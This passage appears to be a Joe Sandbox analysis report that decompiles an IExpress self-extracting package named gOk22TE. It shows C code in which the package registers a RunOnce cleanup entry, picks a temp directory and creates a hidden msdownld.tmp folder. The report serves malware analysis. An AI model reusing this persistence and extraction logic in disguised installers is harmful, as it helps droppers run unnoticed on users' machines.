                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                • Opcode ID: 6958eb14360333b58a6a069389daf9e1eeace4cbceb1e7b99ea94bfa036dc0c7
                                                                                                                                                                                                                                                • Instruction ID: 0836b0f47164795217a833360d9432150cdf74d9c3ef8bcdcf81ae55d0754bb1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6958eb14360333b58a6a069389daf9e1eeace4cbceb1e7b99ea94bfa036dc0c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A09002703511008B96201B73A91D42579D15A5EA42B8154A5B091CD588DB6680405611
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E010E202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x10e8004; // 0x71a8563c
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E010E6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E010E171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E010E658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x10e9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x10e91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x10e91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10e91e5);
						if(_t90 != 0) {
							 *0x10e8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
							E010E171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E010E44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E010E658A( &_v268, 0x104, 0x10e1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x10e8530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                                                                0x010e202a
                                                                                                                                                                                                                                                0x010e2035
                                                                                                                                                                                                                                                0x010e203c
                                                                                                                                                                                                                                                0x010e2041
                                                                                                                                                                                                                                                0x010e2050
                                                                                                                                                                                                                                                0x010e205f
                                                                                                                                                                                                                                                0x010e2064
                                                                                                                                                                                                                                                0x010e206f
                                                                                                                                                                                                                                                0x010e208c
                                                                                                                                                                                                                                                0x010e2094
                                                                                                                                                                                                                                                0x010e2257
                                                                                                                                                                                                                                                0x010e2266
                                                                                                                                                                                                                                                0x010e2266
                                                                                                                                                                                                                                                0x010e209a
                                                                                                                                                                                                                                                0x010e209b
                                                                                                                                                                                                                                                0x010e209d
                                                                                                                                                                                                                                                0x010e20aa
                                                                                                                                                                                                                                                0x010e20af
                                                                                                                                                                                                                                                0x010e20c9
                                                                                                                                                                                                                                                0x010e20d1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e20d3
                                                                                                                                                                                                                                                0x010e20da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e20da
                                                                                                                                                                                                                                                0x010e20e2
                                                                                                                                                                                                                                                0x010e2103
                                                                                                                                                                                                                                                0x010e210e
                                                                                                                                                                                                                                                0x010e2116
                                                                                                                                                                                                                                                0x010e2122
                                                                                                                                                                                                                                                0x010e2128
                                                                                                                                                                                                                                                0x010e212c
                                                                                                                                                                                                                                                0x010e2179
                                                                                                                                                                                                                                                0x010e2194
                                                                                                                                                                                                                                                0x010e21de
                                                                                                                                                                                                                                                0x010e21e4
                                                                                                                                                                                                                                                0x010e2256
                                                                                                                                                                                                                                                0x010e2256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2256
                                                                                                                                                                                                                                                0x010e2196
                                                                                                                                                                                                                                                0x010e2196
                                                                                                                                                                                                                                                0x010e219c
                                                                                                                                                                                                                                                0x010e219f
                                                                                                                                                                                                                                                0x010e219f
                                                                                                                                                                                                                                                0x010e21a1
                                                                                                                                                                                                                                                0x010e21a2
                                                                                                                                                                                                                                                0x010e21a6
                                                                                                                                                                                                                                                0x010e21a8
                                                                                                                                                                                                                                                0x010e21b0
                                                                                                                                                                                                                                                0x010e21b0
                                                                                                                                                                                                                                                0x010e21b2
                                                                                                                                                                                                                                                0x010e21b3
                                                                                                                                                                                                                                                0x010e21bc
                                                                                                                                                                                                                                                0x010e21c7
                                                                                                                                                                                                                                                0x010e21cb
                                                                                                                                                                                                                                                0x010e21f1
                                                                                                                                                                                                                                                0x010e21f6
                                                                                                                                                                                                                                                0x010e21fd
                                                                                                                                                                                                                                                0x010e21ff
                                                                                                                                                                                                                                                0x010e21ff
                                                                                                                                                                                                                                                0x010e2204
                                                                                                                                                                                                                                                0x010e2213
                                                                                                                                                                                                                                                0x010e2218
                                                                                                                                                                                                                                                0x010e221d
                                                                                                                                                                                                                                                0x010e221d
                                                                                                                                                                                                                                                0x010e2220
                                                                                                                                                                                                                                                0x010e2220
                                                                                                                                                                                                                                                0x010e2222
                                                                                                                                                                                                                                                0x010e2223
                                                                                                                                                                                                                                                0x010e2229
                                                                                                                                                                                                                                                0x010e223d
                                                                                                                                                                                                                                                0x010e2249
                                                                                                                                                                                                                                                0x010e2250
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2250
                                                                                                                                                                                                                                                0x010e21d2
                                                                                                                                                                                                                                                0x010e21d9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e21d9
                                                                                                                                                                                                                                                0x010e213a
                                                                                                                                                                                                                                                0x010e2141
                                                                                                                                                                                                                                                0x010e2144
                                                                                                                                                                                                                                                0x010e214c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2163
                                                                                                                                                                                                                                                0x010e2172
                                                                                                                                                                                                                                                0x010e2172
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2163
                                                                                                                                                                                                                                                0x010e20ea
                                                                                                                                                                                                                                                0x010e20f0
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E2050
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E205F
                                                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010E208C
                                                                                                                                                                                                                                                  • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E20C9
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E20EA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 010E2103
                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2122
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010E2134
                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2144
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 010E215B
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E218C
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E21C1
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E21E4
                                                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010E223D
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2249
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2250
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
                                                                                                                                                                                                                                                • API String ID: 178549006-1281856606
                                                                                                                                                                                                                                                • Opcode ID: 8721151be2ce48389aba8df63ad2cabe259ab1fa513347850f1c3bb4bc49dc66
                                                                                                                                                                                                                                                • Instruction ID: 61413f4f215ee9dfda85ec6e159f34a4e4b34b7e3e60d47f79192310cd9be37a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8721151be2ce48389aba8df63ad2cabe259ab1fa513347850f1c3bb4bc49dc66
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6510572A00214AFDB309B67DC4CFEA7BECEB54B40F0041E9BAC5EB145DA769E448B50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 232 10e55a0-10e55d9 call 10e468f LocalAlloc 235 10e55fd-10e560c call 10e468f 232->235 236 10e55db-10e55f1 call 10e44b9 call 10e6285 232->236 241 10e560e-10e5630 call 10e44b9 LocalFree 235->241 242 10e5632-10e5643 lstrcmpA 235->242 248 10e55f6-10e55f8 236->248 241->248 245 10e564b-10e5659 LocalFree 242->245 246 10e5645 242->246 250 10e565b-10e565d 245->250 251 10e5696-10e569c 245->251 246->245 252 10e58b7-10e58c7 call 10e6ce0 248->252 255 10e565f-10e5667 250->255 256 10e5669 250->256 253 10e589f-10e58b5 call 10e6517 251->253 254 10e56a2-10e56a8 251->254 253->252 254->253 259 10e56ae-10e56c1 GetTempPathA 254->259 255->256 260 10e566b-10e567a call 10e5467 255->260 256->260 263 10e56f3-10e5711 call 10e1781 259->263 264 10e56c3-10e56c9 call 10e5467 259->264 269 10e589b-10e589d 260->269 270 10e5680-10e5691 call 10e44b9 260->270 274 10e586c-10e5890 GetWindowsDirectoryA call 10e597d 263->274 275 10e5717-10e5729 GetDriveTypeA 263->275 272 10e56ce-10e56d0 264->272 269->252 270->248 272->269 276 10e56d6-10e56df call 10e2630 272->276 274->263 288 10e5896 274->288 278 10e572b-10e572e 275->278 279 10e5730-10e5740 GetFileAttributesA 275->279 276->263 289 10e56e1-10e56ed call 10e5467 276->289 278->279 282 10e5742-10e5745 278->282 279->282 283 10e577e-10e578f call 10e597d 279->283 286 10e576b 282->286 287 10e5747-10e574f 282->287 295 10e57b2-10e57bf call 10e2630 283->295 296 10e5791-10e579e call 10e2630 283->296 292 10e5771-10e5779 286->292 287->292 293 10e5751-10e5753 287->293 288->269 289->263 289->269 298 10e5864-10e5866 292->298 293->292 297 10e5755-10e5762 call 10e6952 293->297 307 10e57d3-10e57f8 call 10e658a GetFileAttributesA 295->307 308 10e57c1-10e57cd GetWindowsDirectoryA 295->308 296->286 306 10e57a0-10e57b0 call 10e597d 296->306 297->286 309 10e5764-10e5769 297->309 298->274 298->275 306->286 306->295 314 10e580a 307->314 315 10e57fa-10e5808 CreateDirectoryA 307->315 308->307 309->283 309->286 316 10e580d-10e580f 314->316 315->316 317 10e5827-10e585c SetFileAttributesA call 10e1781 call 10e5467 316->317 318 10e5811-10e5825 316->318 317->269 323 10e585e 317->323 318->298 323->298
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E010E55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x10e8004; // 0x71a8563c
				_v8 = _t28 ^ _t110;
				_t2 = E010E468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E010E468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x10e9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x10e8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x10e8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E010E6517(_t82, 0x7d2, 0, E010E3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x10e9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x10e91e4;
									_t40 = GetTempPathA(0x104, 0x10e91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E010E1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E010E6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E010E597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E010E2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E010E658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x10e91e4;
																					E010E1781(0x10e91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E010E5467(0x10e91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E010E2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E010E597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E010E5467(0x10e91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x10e91e4;
											_t70 = E010E2630(0, 0x10e91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x10e91e4;
												_t71 = E010E5467(0x10e91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E010E597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x10e8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E010E5467(0x10e8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E010E44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x10e9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x10e9124 = E010E6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E010E6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                                                                0x010e55ab
                                                                                                                                                                                                                                                0x010e55b2
                                                                                                                                                                                                                                                0x010e55c9
                                                                                                                                                                                                                                                0x010e55d5
                                                                                                                                                                                                                                                0x010e55d9
                                                                                                                                                                                                                                                0x010e5600
                                                                                                                                                                                                                                                0x010e5605
                                                                                                                                                                                                                                                0x010e560a
                                                                                                                                                                                                                                                0x010e560c
                                                                                                                                                                                                                                                0x010e5638
                                                                                                                                                                                                                                                0x010e5641
                                                                                                                                                                                                                                                0x010e5643
                                                                                                                                                                                                                                                0x010e5645
                                                                                                                                                                                                                                                0x010e5645
                                                                                                                                                                                                                                                0x010e564c
                                                                                                                                                                                                                                                0x010e5652
                                                                                                                                                                                                                                                0x010e5657
                                                                                                                                                                                                                                                0x010e5659
                                                                                                                                                                                                                                                0x010e5696
                                                                                                                                                                                                                                                0x010e569c
                                                                                                                                                                                                                                                0x010e589f
                                                                                                                                                                                                                                                0x010e58a7
                                                                                                                                                                                                                                                0x010e58ac
                                                                                                                                                                                                                                                0x010e58b3
                                                                                                                                                                                                                                                0x010e58b5
                                                                                                                                                                                                                                                0x010e56a2
                                                                                                                                                                                                                                                0x010e56a2
                                                                                                                                                                                                                                                0x010e56a8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e56ae
                                                                                                                                                                                                                                                0x010e56ae
                                                                                                                                                                                                                                                0x010e56b9
                                                                                                                                                                                                                                                0x010e56bf
                                                                                                                                                                                                                                                0x010e56c1
                                                                                                                                                                                                                                                0x010e56f3
                                                                                                                                                                                                                                                0x010e56f3
                                                                                                                                                                                                                                                0x010e5705
                                                                                                                                                                                                                                                0x010e570a
                                                                                                                                                                                                                                                0x010e5711
                                                                                                                                                                                                                                                0x010e5717
                                                                                                                                                                                                                                                0x010e5724
                                                                                                                                                                                                                                                0x010e5726
                                                                                                                                                                                                                                                0x010e5729
                                                                                                                                                                                                                                                0x010e5730
                                                                                                                                                                                                                                                0x010e5737
                                                                                                                                                                                                                                                0x010e573d
                                                                                                                                                                                                                                                0x010e5740
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e572b
                                                                                                                                                                                                                                                0x010e572b
                                                                                                                                                                                                                                                0x010e572e
                                                                                                                                                                                                                                                0x010e5742
                                                                                                                                                                                                                                                0x010e5742
                                                                                                                                                                                                                                                0x010e5745
                                                                                                                                                                                                                                                0x010e576b
                                                                                                                                                                                                                                                0x010e576b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5747
                                                                                                                                                                                                                                                0x010e5747
                                                                                                                                                                                                                                                0x010e574d
                                                                                                                                                                                                                                                0x010e574f
                                                                                                                                                                                                                                                0x010e5771
                                                                                                                                                                                                                                                0x010e5771
                                                                                                                                                                                                                                                0x010e5773
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5751
                                                                                                                                                                                                                                                0x010e5751
                                                                                                                                                                                                                                                0x010e5753
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5755
                                                                                                                                                                                                                                                0x010e575b
                                                                                                                                                                                                                                                0x010e5760
                                                                                                                                                                                                                                                0x010e5762
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5764
                                                                                                                                                                                                                                                0x010e5764
                                                                                                                                                                                                                                                0x010e5769
                                                                                                                                                                                                                                                0x010e577e
                                                                                                                                                                                                                                                0x010e577e
                                                                                                                                                                                                                                                0x010e5781
                                                                                                                                                                                                                                                0x010e5788
                                                                                                                                                                                                                                                0x010e578d
                                                                                                                                                                                                                                                0x010e578f
                                                                                                                                                                                                                                                0x010e57b2
                                                                                                                                                                                                                                                0x010e57b8
                                                                                                                                                                                                                                                0x010e57bd
                                                                                                                                                                                                                                                0x010e57bf
                                                                                                                                                                                                                                                0x010e57cd
                                                                                                                                                                                                                                                0x010e57cd
                                                                                                                                                                                                                                                0x010e57dd
                                                                                                                                                                                                                                                0x010e57e3
                                                                                                                                                                                                                                                0x010e57ef
                                                                                                                                                                                                                                                0x010e57f5
                                                                                                                                                                                                                                                0x010e57f8
                                                                                                                                                                                                                                                0x010e580a
                                                                                                                                                                                                                                                0x010e580a
                                                                                                                                                                                                                                                0x010e57fa
                                                                                                                                                                                                                                                0x010e5802
                                                                                                                                                                                                                                                0x010e5802
                                                                                                                                                                                                                                                0x010e580d
                                                                                                                                                                                                                                                0x010e580f
                                                                                                                                                                                                                                                0x010e5830
                                                                                                                                                                                                                                                0x010e5836
                                                                                                                                                                                                                                                0x010e583d
                                                                                                                                                                                                                                                0x010e584b
                                                                                                                                                                                                                                                0x010e5851
                                                                                                                                                                                                                                                0x010e5855
                                                                                                                                                                                                                                                0x010e585a
                                                                                                                                                                                                                                                0x010e585c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e585e
                                                                                                                                                                                                                                                0x010e585e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e585e
                                                                                                                                                                                                                                                0x010e5811
                                                                                                                                                                                                                                                0x010e5817
                                                                                                                                                                                                                                                0x010e5819
                                                                                                                                                                                                                                                0x010e581f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e581f
                                                                                                                                                                                                                                                0x010e5791
                                                                                                                                                                                                                                                0x010e5797
                                                                                                                                                                                                                                                0x010e579c
                                                                                                                                                                                                                                                0x010e579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e57a0
                                                                                                                                                                                                                                                0x010e57a9
                                                                                                                                                                                                                                                0x010e57ae
                                                                                                                                                                                                                                                0x010e57b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e57b0
                                                                                                                                                                                                                                                0x010e579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5769
                                                                                                                                                                                                                                                0x010e5762
